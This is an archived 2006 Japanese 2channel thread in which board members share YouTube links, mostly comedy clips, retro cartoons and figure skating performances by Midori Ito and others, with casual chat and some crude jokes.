2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

◆◇◆既女がYouTubeで遊ぶスレ●その4◆◇◆

1 :可愛い奥様:2006/11/30(木) 23:01:54 ID:AjCmDuVz
色々なスレに張られているYouTubeの動画、面白いのを見つけたら、
ここに張って、皆に紹介してくださいね!
それをネタに皆で盛り上がりましょう。
http://www.youtube.com/index.php

保存したいなら↓
VDownloader 0.2 (Youtube, Google Video, Grinvi)
ttp://www.enriquepuertas.com/wp-content/files/vdownloader.zip

1.DL・解凍後、VDownloaderを起動する
2.動画URLを入力してDownloadボタンをクリック
3.AVIまたはMPEGを指定するDialogが出るのでどちらか選んでOKをクリック
4.指定した保存先にDLされた後、自動的にAVIまたはMPEGに変換される

スクリーンショット
ttp://comunidad.uem.es/myfiles/epuertas/vdownloader02.jpg

前スレ
◆◇◆既女がYouTubeで遊ぶスレ●その3◆◇◆
http://human5.2ch.net/test/read.cgi/ms/1160489430/

2 :可愛い奥様:2006/11/30(木) 23:04:26 ID:fEmuA4Nw
2getかも

3 :可愛い奥様:2006/12/01(金) 00:25:12 ID:RFCifreD
>>1乙!
「とくダネ!」でヨン様フィギュアの首がもげる
http://www.youtube.com/watch?v=MMw8CnLfk0A

4 :可愛い奥様:2006/12/01(金) 02:11:24 ID:5cxTBsE6
日本の某有名企業の海外でのCM。犬好き必見。
http://www.youtube.com/watch?v=XYO4wUSG5c0&mode=related&search=

5 :可愛い奥様:2006/12/01(金) 04:19:21 ID:vAG9l41s
http://www.youtube.com/watch?v=qxnbZl8MayQ
女の子のチュかわいい

6 :可愛い奥様:2006/12/01(金) 13:30:39 ID:LBXwY2AC
>>4 
犬の表情がうまく出てるけど、あのシーンだけはお茶の間で見たくない・・・。

7 :可愛い奥様:2006/12/01(金) 19:41:52 ID:foaMM+Do
なさけないファンファーレw
http://www.youtube.com/watch?v=Hk4_FlyNNZk&search=

8 :可愛い奥様:2006/12/01(金) 19:55:36 ID:99ENmwFL
>>7
ひどすぎる…

9 :可愛い奥様:2006/12/01(金) 19:59:54 ID:jmQl+pF8
>>7
伝説だねw
ftp://igasaki.ddo.jp/pub/iga/keiba/mp3/JRA2_Grade_SH.mp3
これがどうしてこうなるのだか。難曲なのかな?

10 :可愛い奥様:2006/12/01(金) 22:09:08 ID:+xZzEtQ9

バス専用道路らしい‥‥
http://www.youtube.com/watch?v=i_Cw0QJU8ro

11 :可愛い奥様:2006/12/01(金) 23:41:38 ID:tU6l2Hxd
前スレで外出じゃなかったか?

12 :可愛い奥様:2006/12/01(金) 23:53:09 ID:qA7x8ZU8
>>10
先週あたりに見たw

13 :可愛い奥様:2006/12/02(土) 09:56:28 ID:0dJ1qz7l
既出かもしれないけど・・・

http://www.youtube.com/watch?v=qAzguhnfJCc

「人を怒らせる方法」

14 :可愛い奥様:2006/12/02(土) 10:05:26 ID:E8Hs2KCU
>>13
声だして笑った。
まさか、ほんとに教育ビデオ?

15 :可愛い奥様:2006/12/02(土) 13:44:43 ID:3Nbzgr1d
>>13
最後の方は珠代姐さんの
「時間よ止まれ」になってるしww

16 :可愛い奥様:2006/12/02(土) 20:44:41 ID:Rb1v3QnB
VJユニット、プリンストンガの映像サンプリング作品 BONDTV
http://www.youtube.com/watch?v=3afrlIHampE

17 :可愛い奥様:2006/12/02(土) 23:01:20 ID:9r8glgBW
B'z Be There
http://www.youtube.com/watch?v=GOKxat_Sv2k

18 :可愛い奥様:2006/12/02(土) 23:14:34 ID:9r8glgBW
十数年前にB'zがZ'bという名前でシークレットライブをしていました。
コント調で、志村の名前は「綾小路ナントカ(不明瞭で聞き取れず)となってます。

http://www.youtube.com/watch?v=y2f-2GN7CuU

19 :可愛い奥様:2006/12/02(土) 23:15:07 ID:p/NBICsH
11月26日に、探偵ファイルの企画で行われた合気達人の柳 龍拳氏と
総合格闘家の岩倉 豪氏の壮絶なる他流試合です。
テレビ局も取材に来ていた模様。

柳 龍拳の伝説となった動画
http://www.youtube.com/watch?v=tib2Urowsdc
柳龍拳プロフィール
http://www.daitouryu-aikidou.jp/cgi-bin/daitouryu/siteup.cgi?category=3&page=0
負けたら看板を下ろすそうです
http://www.daitouryu-aikidou.jp/cgi-bin/daitouryu/siteup.cgi?category=4&page=5

そして試合結果は(動画をご覧ください)
http://www.youtube.com/watch?v=bQeUkUO5ZPo

20 :可愛い奥様:2006/12/02(土) 23:52:43 ID:Rb1v3QnB
既出だったらスマソ
昔セサミストリートなどであったような映像だけど、
この人たち素人だとしたら凄い。
http://www.youtube.com/watch?v=AJzU3NjDikY

21 :可愛い奥様:2006/12/02(土) 23:59:04 ID:gbvQZXGj
>>13
ナニコレwww

22 :可愛い奥様:2006/12/03(日) 00:55:12 ID:cp7de40O
>>18
B'zヲタな私には嬉しいけど他の人はこんなの見てもポカーンだと思うぞ。

23 :可愛い奥様:2006/12/03(日) 01:28:22 ID:wgpPhXOm
>>18
TAKが寒すぎてワロタwww

24 :可愛い奥様:2006/12/03(日) 02:14:28 ID:M3hdmvp3
>>19
(ノ∀`)アチャー

25 :可愛い奥様:2006/12/03(日) 05:02:52 ID:IuaVInPO
>>23
TAKってこの人のことだと思った

http://www.youtube.com/watch?v=iegH_5fWWUo

26 :可愛い奥様:2006/12/03(日) 07:10:55 ID:b2mBKRK7
代ゼミ 荻野 接点TMIX
http://www.youtube.com/watch?v=RD9la7eNK1A

27 :可愛い奥様:2006/12/03(日) 07:21:06 ID:b2mBKRK7
26の元ネタ
荻野 接点T
http://www.youtube.com/watch?v=K4slIWFXviQ&mode=related&search=

28 :可愛い奥様:2006/12/03(日) 10:26:17 ID:qgpMD4AD
>>25
何コレ?不細工男と不細工女たちの戯れ。

29 :可愛い奥様:2006/12/03(日) 11:06:17 ID:wYe0Zy71
スレ違いですが、乳首を背後からこりこり、すりすりされたいですか?

30 :可愛い奥様:2006/12/03(日) 11:27:08 ID:Jd48Ng8h
爆笑問題「タイムスリップ劇場」

http://www.youtube.com/watch?v=TZ4-Pkgxrqo

31 :可愛い奥様:2006/12/03(日) 11:54:14 ID:D0FK6R3X
B'zの稲葉浩志が数学教師だったら
http://www.youtube.com/watch?v=1sQG8XAdicU&mode=related&search=


本人もウケたようですww

32 :可愛い奥様:2006/12/03(日) 12:50:47 ID:Z2W3XYMF
有名なUMA(未確認生物)の動画

http://www.youtube.com/watch?v=QbJJGIRW9NM

33 :可愛い奥様:2006/12/03(日) 15:55:49 ID:OjAKJ7aQ
>>31
ちょっと面白かったw

34 :可愛い奥様:2006/12/03(日) 16:05:22 ID:u/lb1Aov
http://www.youtube.com/watch?v=4XUPK_RCHiY
セーラー服と機関銃
探偵物語

35 :可愛い奥様:2006/12/03(日) 19:10:19 ID:wtBeQ5dN
>>32
うっ!うっ!うっ!wwwwwwwww

36 :可愛い奥様:2006/12/03(日) 22:59:09 ID:eRBSa4/l
>>32
懐かしい。あの写真の画像だね?
ワロタw

37 :可愛い奥様:2006/12/03(日) 23:42:00 ID:adKag4aB
あのー・・・
おめでとうございます!あなたが999999人目の視聴者です(←数字うろ覚え)
YOU WON! YOU WON! YOU WON!
とかって出てきて、個人情報入力しる、って画面に進んだんだけど、
なにしろ英語が1番苦手な教科で(中の中の高校でクラスでビリだったくらい)
文章がさっぱり解読できないし、そもそもコレってちゃんとしたやつなんだろうか?
ワンクリック詐欺みたいなの?
英語だからあやしさ倍増に見える。なんなんだ。どうしたらいいんだ。


38 :可愛い奥様:2006/12/03(日) 23:43:07 ID:bi94wJVu
もうええっちゅうねん。アホが。

39 :可愛い奥様:2006/12/03(日) 23:58:38 ID:adKag4aB
あ、コレ有名なの?
無視していいんだよね?
アフォですまん・・・

40 :可愛い奥様:2006/12/04(月) 00:32:11 ID:a0+5oGHE
日本でもありがちな広告だよね。
ちょっと前に話題になった
セキュリティチェックの偽広告でスパイウエアが入れられちゃうってのが
なくなったと思ったら、こっちが出てきたね。
画面がちかちかしてうざったいので
上の方にスクロールして画面外に出して見てる。

41 :可愛い奥様:2006/12/04(月) 10:35:13 ID:7kitPBtv
線を引いて掛け算を解く動画
http://www.youtube.com/watch?v=AtgCJv4DNrY&eurl=


すごいね。こんなの知らなかった。

42 :可愛い奥様:2006/12/04(月) 10:37:17 ID:7kitPBtv
食通
http://www.youtube.com/watch?v=JYygPApFp8I&eurl=

上手いね

43 :可愛い奥様:2006/12/04(月) 12:55:33 ID:2KCimJDL
>>42
声優さん同じだよね

44 :可愛い奥様:2006/12/04(月) 13:34:22 ID:+DBGqNa7
ボレロ マイヤ・プリセツカヤ

http://www.youtube.com/watch?v=2aK68IdDuGM&eurl= (part1)
http://www.youtube.com/watch?v=yietPuC8fWE&mode=related&search= (part2)

45 :可愛い奥様:2006/12/04(月) 13:52:10 ID:aP1YnNLw
>>44
ボレロ好きだから思わず見入っちゃった。
予想通り変よかった。

46 :可愛い奥様:2006/12/04(月) 15:53:05 ID:vM3QooEu
>>37
確かに、あの画面ウザイよね。
ようつべが買収されてからかな。
×で消そうとしても消えないし。
私も下にスクロールして見てるよ。

47 :可愛い奥様:2006/12/04(月) 16:05:53 ID:A8y3Z/EV
>>9
管楽器は温度湿度に影響されちゃうしね。プロほどしっかり管理してないだろうし、
屋外で雨の中じゃ相当コンディション悪かったのでは。

48 :可愛い奥様:2006/12/04(月) 16:36:13 ID:ViiJEtxj
>>41
すっごいなあ。目からウロコものだったよ。
電卓がないときにでもやってみよう。


49 :可愛い奥様:2006/12/04(月) 21:47:41 ID:y2wraPrw
http://www.youtube.com/watch?v=3fozrgSTvMg
既出まお

50 :可愛い奥様:2006/12/04(月) 22:35:06 ID:3JuNr76I
>>48
789×987やってみれ

51 :可愛い奥様:2006/12/04(月) 22:42:40 ID:M5aaBAG9
>>50
たくさん

52 :可愛い奥様:2006/12/04(月) 23:55:33 ID:Cs8XQE6i
>>45
ボレロ好きならお勧め、「サラエボの恋人たち」と言われたアイスダンス。
ttp://www.youtube.com/watch?v=t2zbbN4OL98

53 :可愛い奥様:2006/12/05(火) 00:08:32 ID:jrNbu/CZ
>>52
おぉ、そうそうボレロはエロちっくだから(ってのもあれだがw そして個人的主観ね)
男女の美しい滑りには合うわぁ。さすがに全曲通してじゃないのは残念だが。ありがと〜

54 :可愛い奥様:2006/12/05(火) 01:55:22 ID:aXKF8VDo
37 目噛んで市ね

55 :可愛い奥様:2006/12/05(火) 02:19:57 ID:7mX9Y5lw
スケートつながりで
天才ジャンパー伊藤みどりのスケートで
後半でこぶしを上げてごーごー!みたいにやってる奴。
探してるんだけど見つからない・・・。
最後両手で顔を覆ってうれし泣きしちゃうんだよね。

実況している外国のアナウンサーが
ゴーゴーで凄く受けていたのを覚えてる。

56 :可愛い奥様:2006/12/05(火) 03:36:09 ID:jDxliM61
>>55
http://www.youtube.com/watch?v=5BjA0bZeISI&mode=related&search=
力こぶと両手

http://www.youtube.com/watch?v=SlTkkV9oLIk&NR
お探しはこれかな 4:07位で一瞬ガッツポーズ 実況大騒ぎ みどり号泣

伊藤みどり凄いね〜
意地になって探してたくさん観たけど感動した〜

探しつながりでw地中に深く埋まってる岩を念力?を使って浮かばせるのご存じないですか?
超能力者?と伊集院と女の子のタレント・男の子のタレントで外でロケしているやつです。

57 :可愛い奥様:2006/12/05(火) 12:57:41 ID:DmI/6pp0
長野五輪の聖火台に点火するシーンないですか?

58 :可愛い奥様:2006/12/05(火) 14:51:04 ID:5KNcgwZI
>>56
伊藤みどり、子供の頃リアルタイムで見てた時本当に鳥肌立った。
当時あったコンパルソリーが苦手で下の方からがんがん上がって行くし。
スポーツで感動させてくれた初めての人だ。

ようつべで海外での中継のヤツをみると解説が驚嘆してるし観客も大騒ぎ。
こんな中でやりとげる伊藤みどりとその孤独を考えると泣けてくる。
その後いろいろ大変だったけど幸せになってほしい。

59 :可愛い奥様:2006/12/05(火) 15:15:16 ID:893vpprU
>>57
探したけど無かった・・・

60 :可愛い奥様:2006/12/05(火) 16:44:51 ID:xYwSWRCf
↑お人よし

61 :可愛い奥様:2006/12/05(火) 18:39:29 ID:bLu9uUjM
>>59は義理と人情に厚いヤクザ。


62 :可愛い奥様:2006/12/05(火) 18:59:38 ID:bY3dSoI1
前々スレで出てた、ちょとグロイらしい分娩の様子のやつってもうない?
今更ながら見たいんだけど、検索しても見つからない・・・


63 :可愛い奥様:2006/12/05(火) 19:00:40 ID:bY3dSoI1
やべ、こんな内容の時に限ってageてしまった・・・鬱スマソ

64 :可愛い奥様:2006/12/05(火) 19:06:48 ID:o20blyty
>>61で思い出した

二代目はクリスチャン  殴りこみシーン、血とか出ます。
http://www.youtube.com/watch?v=f8jYT3dTEyA

↑で思い出したその旦那

長渕キック→893→みんなのうた  サザンの曲にプンプンしてます。
http://www.youtube.com/watch?v=ADUhomO24vI

65 :可愛い奥様:2006/12/05(火) 19:16:57 ID:aBWc3agN
>>56
おおお!有難うございました!これですこれです!
衣裳の記憶が、初めてトリプルアクセル飛んだときのとごっちゃになっていて
見つけられませんでした。
彼女150cm無い身長なのにジャンプで1m飛ぶんですよね。
ライバルのクリスティーヤマグチが、彼女みたいに飛べたらなと
物凄く羨んでいたと、当時の記事で読んだ記憶があります。

>>58
あまりに高く、そして成功率の高いジャンプで
天才ジャンパーと言われていた彼女ですが
着地のときの足腰の負担は、通常選手とは比べ物にならない程だったとか。
今見ても素晴らしいですね。

66 :可愛い奥様:2006/12/05(火) 19:25:27 ID:DHnRnwsZ
>>64
おお…初恋の相手、北大路欣也が。ナツカシス。

67 :可愛い奥様:2006/12/05(火) 20:21:28 ID:vImMX7OA
「ただ一撃にかける」武士道はすばらしいね
http://www.youtube.com/watch?v=HbsvUU47HIM&mode=related&search=

68 :可愛い奥様:2006/12/05(火) 21:22:31 ID:0g36uuee
日本音楽著作権協会(JASRAC)など23の著作権関係権利者団体・事業者は5日、米国の動画投稿サイト「YouTube
(ユーチューブ)」に対し、著作権侵害の予防策を講じるよう要請したと発表した。15日までに具体策を回答するよう求めて
いる。

23団体は今年10月、YouTubeが著作権許諾のないテレビ番組や映画などの投稿画像を掲載していたとして、ファイル
約3万件を削除させた。だが、その後も違法な投稿が続いたことから、対策強化を求めた。対策例として(1)違法な投稿は
民事・刑事責任を問われることがあると日本語で警告表示する(2)投稿者に氏名・住所を登録させる(3)過去に違法な投
稿をした人の登録を無効にする−−を挙げた。

69 :可愛い奥様:2006/12/05(火) 23:06:50 ID:MwmJEbJL
Wiiを購入しにあらわれたシャア・アズナブル
http://www.youtube.com/watch?v=sws5DhhoTpI

70 :可愛い奥様:2006/12/05(火) 23:30:34 ID:uY8uxth/
>>65
1988のオリンピックで規定+フリーは5位で
このフリーだけでは3位だったとか。
このノーミスのすごいフリー演技が何で3位なの〜?

71 :可愛い奥様:2006/12/05(火) 23:49:27 ID:GTB/8ptO
>>69
船橋w

72 :可愛い奥様:2006/12/05(火) 23:51:16 ID:X1gaFOhH
真央の3回転×3を見ても荒川のイナバウアー見ても
全然すごいと思わない。
むしろ重そうとかツラそうと思ってしまう。
そう思う原因は、昔伊藤みどりを見てたからなのか、
と納得しました。

73 :可愛い奥様:2006/12/05(火) 23:53:15 ID:JPiwG0Wg
も〜、Wii買い物客はしゃれっ気ありすぎるなあ。
コントローラーに帝国軍兵にシャアw

74 :可愛い奥様:2006/12/06(水) 00:20:21 ID:d7khalec
ホームレスだっているんだよ

75 :可愛い奥様:2006/12/06(水) 00:45:05 ID:I2Ueyoe4
>>72
ttp://www.youtube.com/watch?v=01qHxQj_bhg&mode=related&search=
これも超お勧め。
89年世界選手権で日本人初めての金を取ったとき。
テクニカルで6.0が5つ並んだときの実況の盛りあがりったら。
その決め手が女子初めてのトリプルアクセル成功。

この人のジャンプって本当に空を飛ぶようなんだよね。
疲れてきてるはずの後半で、平気でトリプル&トリプルのコンビネーション入れるし、
しかも通常低くなるはずの2回目の方が、1回目よりも高く飛んでる。

ttp://www.youtube.com/watch?v=rhuyGU6JZHc&mode=related&search=
3回目のアンコールでトリプルアクセルを飛ぶ。



76 :可愛い奥様:2006/12/06(水) 02:34:49 ID:ADKHxi96
>>75
ピンクの衣装のみどりがとても魅力的!素晴らしい!!
寝る前にココに寄って良かった〜思わず涙
今日はみどりの夢を見よう!!

77 :可愛い奥様:2006/12/06(水) 08:56:40 ID:pnBihg4K
>>70
technical pointは高いけど、artistic pointが・・・って事なんでしょうか?
北欧のお人形さんみたいな女の子に比べて日本人は不利だなぁと思いました。
伊藤みどりは改めてみると、本当にすばらしい!
カメラに激突したシーン、初めて見ましたw

78 :可愛い奥様:2006/12/06(水) 12:39:15 ID:S7//shv2
http://www.youtube.com/watch?v=DKn10wt96kk&mode=related&search=
特攻隊が主人公のアニメ

戦争ために若くして散っていった人たちの悲しい物語。

79 :可愛い奥様:2006/12/06(水) 12:52:15 ID:uhAoAJFZ
>>31
稲葉がこんなに笑ってるのははじめて見た。

80 :可愛い奥様:2006/12/06(水) 12:53:18 ID:AkEa0wlu
オゥラーーイ!でワロタw

81 :可愛い奥様:2006/12/06(水) 17:23:43 ID:npIoM/AX
母親「…」
http://www.youtube.com/watch?v=XCKoHbwVZc8

82 :可愛い奥様:2006/12/06(水) 17:51:38 ID:4qFPFxNY
尻尾かと思ったらチンコかよ
チンコNAGEEEEEEEE!!!

83 :可愛い奥様:2006/12/06(水) 20:56:10 ID:hqfJX1gC
ママ〜あれナニしてんの???w

84 :可愛い奥様:2006/12/06(水) 22:36:39 ID:9OoU7MGp
チンコ動いてなかった?すげぇよ!

85 :可愛い奥様:2006/12/06(水) 22:42:33 ID:bJy1p4n4
人間だってチンコ動くでしょ

86 :可愛い奥様:2006/12/06(水) 22:49:41 ID:ptQs6yxh
うるせーな、最中なんだから静かにしてやれよ!となぜか思ってしまった。

87 :可愛い奥様:2006/12/06(水) 22:56:28 ID:AkEa0wlu
ママァーあれ何してるのぉ〜?

セックスよ

とバッサリ言える母親になりたひ

88 :可愛い奥様:2006/12/06(水) 23:47:43 ID:/8AZg30G
いや、交尾だろ

89 :可愛い奥様:2006/12/07(木) 00:00:48 ID:Tsz4izL8
>>67
すごいね。最後は集中力が勝ってた感じだね。


90 :可愛い奥様:2006/12/07(木) 03:05:39 ID:ZDG6JSOR
スケート話に乗ってもいい?
曲が途絶えても滑り続ける2人。
「曲無しで滑ったことなどない」と後に語ったそうなのでこのときも
彼らには聞こえていたのでしょう。たしかこの後失格になったと思う。

http://www.youtube.com/watch?v=WOAvSe3ExpI&search=Gordeeva%201987

91 :可愛い奥様:2006/12/07(木) 04:10:44 ID:okPsI9R5
http://adult.agesage.jp/contentsPage.html?mcd=bjXrJchf9sQfLGb3


これは犯罪だろ

92 :可愛い奥様:2006/12/07(木) 05:21:33 ID:9oGhQUIQ
>>91
なにこれ九分九厘ヤラセでしょ?
合法合法

93 :可愛い奥様:2006/12/07(木) 08:46:45 ID:cKrTZjCH
江頭伝説(ちょい下ネタ)
http://www.youtube.com/watch?v=a2yX9qnv95A
ヒトシ君のコメントもいい。

94 :可愛い奥様:2006/12/07(木) 08:51:36 ID:cKrTZjCH
連続江頭スマソ
本当に死ぬかと思ったベスト5
http://www.youtube.com/watch?v=IJWseO4m0eg&NR

95 :可愛い奥様:2006/12/07(木) 13:11:11 ID:ifp3kvDB
トービル・ディーン組のボレロ。
芸術点(?)がオール満点ですばらしいよ。
http://www.youtube.com/watch?v=Ru6qjbRghyU&search=Olympics%201984

96 :可愛い奥様:2006/12/07(木) 13:17:21 ID:im9LStTX
>>95
当時は今後ボレロを滑るアイスダンスペアは現れないだろうと
言われるぐらい、とても絶賛されたね。
リレハンメルだったかに復帰出場して、再度ボレロ滑ったよね。

97 :可愛い奥様:2006/12/07(木) 13:23:32 ID:ifp3kvDB
>>96
リレハンメルのエキシビジョンで滑ったみたいですね。
それも探してるんですがまだ見つからない〜。

98 :可愛い奥様:2006/12/07(木) 14:14:47 ID:lfIpxdhn
>>95
興奮した

99 :可愛い奥様:2006/12/07(木) 14:49:54 ID:PVrhJ8H/
>>95
゜+.゜(n'∀')η゜+.゜スンバラスィワァァァァァ 
ボレロってバレエのイメージだったけど、これからはこれを思い浮かべるだろうな。

お礼に、くだらないところで
プルシェンコのパンツと
ttp://www.youtube.com/watch?v=hOsf0QcO2uY
チュッパチャップスのCM
ttp://www.youtube.com/watch?v=fLFOu3X3LbY

100 :可愛い奥様:2006/12/07(木) 15:13:34 ID:dgq7zPwu
100

101 :可愛い奥様:2006/12/07(木) 16:32:00 ID:zqJfIxWM
伊藤みどりのガッツポーズ懐かしい!
確か記憶が定かじゃないけど、振り付けとは違う、演技中にガッツポーズなんて
などと物議をかもして、点数が低くなるのではとか色々いわれちゃったんだよね。
で、次のときは思わず出そうなガッツポーズを必死で控えめにしてた。
当時、くだらないことでガタガタいうなーと思った。
伊藤みどりはジャンプもすごかったけど、スピンも高速だし、
ただ滑っているだけでもスピード感がぜんぜんほかと比べて違ってた。
ヲタじゃないけど、スタイル以外は本当に申し分ない選手だったよね。
フィギュアスケートはスポーツだ!って思い知らせてくれたのも彼女だったな。
芸術性を追求するカタリーナビットかミシェルクワンだったかが
「ゴムまりみたいにはねてりゃいいってもんじゃない」なんて負け惜しみ言ったりしてた。



102 :可愛い奥様:2006/12/07(木) 19:51:05 ID:LuFFN0O+
>>101
ゴムまり発言はカタリーナ・ビットだね。

103 :可愛い奥様:2006/12/07(木) 20:17:54 ID:FWkbCRr9
>>95=>>52だね

104 :可愛い奥様:2006/12/08(金) 06:33:09 ID:4C+gzHYi
雨音はショパンの香りPV
ttp://www.youtube.com/watch?v=boo6Jt34_5k
石原真理子スレで80年代の話で盛り上がっており
「小林麻美はいつも顔が良くわからなくて美人だったかのかどうか」
というレスがあったので。確かに良くわからない。

105 :可愛い奥様:2006/12/08(金) 06:39:58 ID:4C+gzHYi
>>52
マーヴェラス!スラックスのフレア具合さえ完璧に見えるよ。

106 :可愛い奥様:2006/12/08(金) 08:17:11 ID:4sHY4u/i
トムトジェリーの真ん中の話大好きだったから久々に見れて嬉しい!

「ステキな自動車」
http://www.youtube.com/watch?v=ctW3JJnsOME

「こんなお家は」
http://www.youtube.com/watch?v=KdnuxEUQ-Ck

あと、歌も懐かしかった。
http://www.youtube.com/watch?v=vuNMLEQd3hk

107 :可愛い奥様:2006/12/08(金) 09:21:11 ID:fSmbyA1w
>>106
テックス・エイヴリー!しかも吹き替え版!テラナツカシス

108 :可愛い奥様:2006/12/08(金) 09:49:54 ID:uCo6rXnc
>>106
(,_ノ`)b

109 :可愛い奥様:2006/12/08(金) 11:39:58 ID:kx62rJkz
今更ながら伊藤みどりの素晴らしさに感動してしまった。
こんなジャンプ、確かに見たことないね!!!
今滑ってる日本人がショボくみえてきたよ〜。
この技術力にスグリとかの表現がつけば最高だね。


110 :可愛い奥様:2006/12/08(金) 12:51:16 ID:EjiYXUkp
スグリの顔芸はイラネ。
浅田姉妹の足の長さがみどりにあれば、最高だったと思う

111 :可愛い奥様:2006/12/08(金) 13:34:16 ID:cj8snQL6
こんなのも見つけた!
1990世界選手権でヴィクトール・ペトレンコとの即興ペアスケーティング。
練習打ち合わせ全く無し。数分の話合いのみで
ここまで滑れるのは流石。
スピンがずれるのもご愛嬌だね。
ttp://www.youtube.com/watch?v=EmQzmJREDJ0&mode=related&search=

112 :可愛い奥様:2006/12/08(金) 13:40:37 ID:cj8snQL6
>>110
確か、山田満知子コーチがまおちゃんのコーチやってるときに
「まおはみどりと(プロポーションが)違って〜」と言ったんだよね。
あのバレリーナばりの手足の長さは、美しさも点の一つのフィギュアには
物凄く有利だと思う。

113 :可愛い奥様:2006/12/08(金) 14:05:58 ID:hAOkxapZ
スケートじゃなくてスマソ
美女と野獣
凄く好きなドラマなのでまたテレビでやってくれないかなと思ってる

http://www.youtube.com/watch?v=VlaExZlP2LM&mode=related&search=
http://www.youtube.com/watch?v=2jY2LbX8X6E&mode=related&search=




114 :可愛い奥様:2006/12/08(金) 15:30:46 ID:njhFJ38W
>>106うはっ!めちゃ嬉しい!
スカパーでやってるんだけど吹き替えは違うし
真ん中のはやらないしで(´・ω・`)ショボーンだったので。

真ん中の、これも面白かった「へんてこなオペラ」
ttp://www.youtube.com/watch?v=JbWgubnpfzo

115 :可愛い奥様:2006/12/08(金) 15:39:53 ID:njhFJ38W
連投だけどこれもテンポが最高「うらやましいテレビ」
ttp://www.youtube.com/watch?v=LnzZRqWM3nY

116 :可愛い奥様:2006/12/08(金) 16:20:20 ID:w0FAVTJa
トムジェリで印象的なのは
ピアノの下敷きになってトムが死ぬ話と
吹雪の晩に外に放り出されて凍えるんだけど
ジェリーが助けてくれる。その後ジェリーが外に放り出されて
アイスクリームバーみたいになっちゃうのをトムが助ける話


117 :可愛い奥様:2006/12/08(金) 16:25:20 ID:8T70TENZ
トムジェリの真ん中見たかったんだー。ありがとう!

118 :可愛い奥様:2006/12/08(金) 16:36:19 ID:H28ciN2c
http://www.youtube.com/watch?v=7vm__gmK7J4
幽霊城のドボチョン一家

トムジェリ見てて思い出したらありました
個人的に涙もののなつかしさ

119 :可愛い奥様:2006/12/08(金) 16:45:26 ID:z1qjrJgN
なつかしいシリーズに便乗して

http://www.youtube.com/watch?v=Wwryyd6sIUk

ヒューヒューとポーポーだよ

120 :可愛い奥様:2006/12/08(金) 17:08:05 ID:cF1m7QOo
I play Wii on my 1.5-inch TV #2
http://www.youtube.com/watch?v=B82SJOJKPL4


121 :可愛い奥様:2006/12/08(金) 18:26:26 ID:Pr2bDocO
>>104
奥様、「雨音はショパンの調べ」では?
小林麻美って、今 何歳なんでしょうね?
美人というより、ファニーフェイスって感じですかね・・・?

122 :可愛い奥様:2006/12/08(金) 18:47:24 ID:VZL7O+ZS
桂歌丸さんにソバージュヅラを乗っけたら麻美に・・・w

123 :可愛い奥様:2006/12/08(金) 18:53:57 ID:0NYaAm26
ヒューヒューとポーポー!!ひ〜

あと、http://www.youtube.com/watch?v=OreKtQx0pUE
ラリホー♪

124 :可愛い奥様:2006/12/08(金) 18:55:07 ID:0NYaAm26
らくだの出てくる、大魔人シャザーンを探したけどなかった・・・
見たいのにー

125 :可愛い奥様:2006/12/08(金) 19:05:18 ID:z1qjrJgN
これ?
http://www.youtube.com/watch?v=FMYNzd80fOk



126 :可愛い奥様:2006/12/08(金) 19:20:16 ID:0NYaAm26
ぎゃー!これこれ!
見たかったんだーらくだとはげ。
あの指輪が欲しくて欲しくて・・・ありがとう!

127 :可愛い奥様:2006/12/08(金) 20:31:19 ID:Owop9OzP
http://www.youtube.com/watch?v=UXmqnAHa4Vs&NR
食事中の人は見ない

128 :可愛い奥様:2006/12/08(金) 22:59:45 ID:U87hQvnA
EXILEの新メンバーが音外した歌が見たいんですが、何で検索したら出ますか?
こないだの一億三千万人が選ぶなんちゃらって番組のです。

129 :可愛い奥様:2006/12/08(金) 23:04:55 ID:U87hQvnA
お騒がせしました!
みつかりましたorz

130 :可愛い奥様:2006/12/09(土) 02:47:17 ID:yyayai8u
崖っぷち犬と松の木の白猫のレスキュー動画をお願いします。

131 :可愛い奥様:2006/12/09(土) 02:59:55 ID:2XSje4k0
>>130
鼻水垂れてた猫は救出されたの?

132 :可愛い奥様:2006/12/09(土) 03:09:34 ID:2WL1z4k1
既出だったらすんまそ
999999人目が〜、って気になった方はとりあえず
↓これ見てください
http://www.youtube.com/watch?v=O81J2nJhdZw

133 :可愛い奥様:2006/12/09(土) 03:34:24 ID:Oh6fJ6D5
>>131
|_・。)つttp://up.nm78.com/old/data/up119531.jpg
|ω・)つttp://up.nm78.com/old/data/up119533.jpg
|д`)つttp://up.nm78.com/old/data/up119546.jpg


134 :可愛い奥様:2006/12/09(土) 07:22:59 ID:+xMLbB+7
カリン様だったのかあ。

135 :可愛い奥様:2006/12/09(土) 08:07:17 ID:hdHPizje
>>133
( ゚∀゚)アハハ八八ノヽノヽノヽノ \ / \/ \

136 :可愛い奥様:2006/12/09(土) 09:12:23 ID:IggN+2IG
>>118さんの紹介してくれたビデオの2分20秒あたりに出てくる女の子の名前
ご存知の方、いらっしゃいませんか?
たしか、彼女を主人公にしたアニメも昔あったのです。

137 :可愛い奥様:2006/12/09(土) 09:47:39 ID:r00TLa9M
魔女サブリナ または かわいい魔女サブリナ

その後、実写版ドラマも出来たよね。



138 :可愛い奥様:2006/12/09(土) 09:52:32 ID:r00TLa9M
http://www.youtube.com/watch?v=0VKsdf6n58Y

あったよ。Sabrina the Teenage Witch
日本語版が見つけられなくてごめん・・・



139 :可愛い奥様:2006/12/09(土) 10:00:34 ID:6SG9hYdx
空耳〜
http://www.youtube.com/watch?v=9PMckJ0Xwy0

140 :可愛い奥様:2006/12/09(土) 10:49:59 ID:9BXLkEzr
>>139
爆笑

141 :可愛い奥様:2006/12/09(土) 12:38:11 ID:C0LnJDpG
139のも大笑いしてけど
そこで関連してみつけた金正日豚汁もおもろかった。
http://www.youtube.com/watch?v=oVE5D_5hjo4&mode=related&search=

金賞に血、変換されねー!
きむじょんいるで一発変換。キモ・・・

142 :可愛い奥様:2006/12/09(土) 14:05:20 ID:9BXLkEzr
>>141
すごい力作!!


143 :可愛い奥様:2006/12/09(土) 14:19:29 ID:7lfGwe+M
>>141
ありがと 笑わせてもらいますた

144 :可愛い奥様:2006/12/09(土) 15:22:22 ID:Au93Azmu
>>141
2ちゃん歴数年。
初めて涙が出るほど≧∇≦ブハハハハハ

145 :可愛い奥様:2006/12/09(土) 15:38:46 ID:8wHhvEuw
んー私は>>139のほうが好き。じわじわよかった。やっぱり人それぞれだな。

146 :可愛い奥様:2006/12/09(土) 16:11:10 ID:yyayai8u
この人かっこよすぎ。
もし体操やってたらすごい選手になってただろうなぁ。
http://www.youtube.com/watch?v=uISZvywmsxM&mode=related&search=

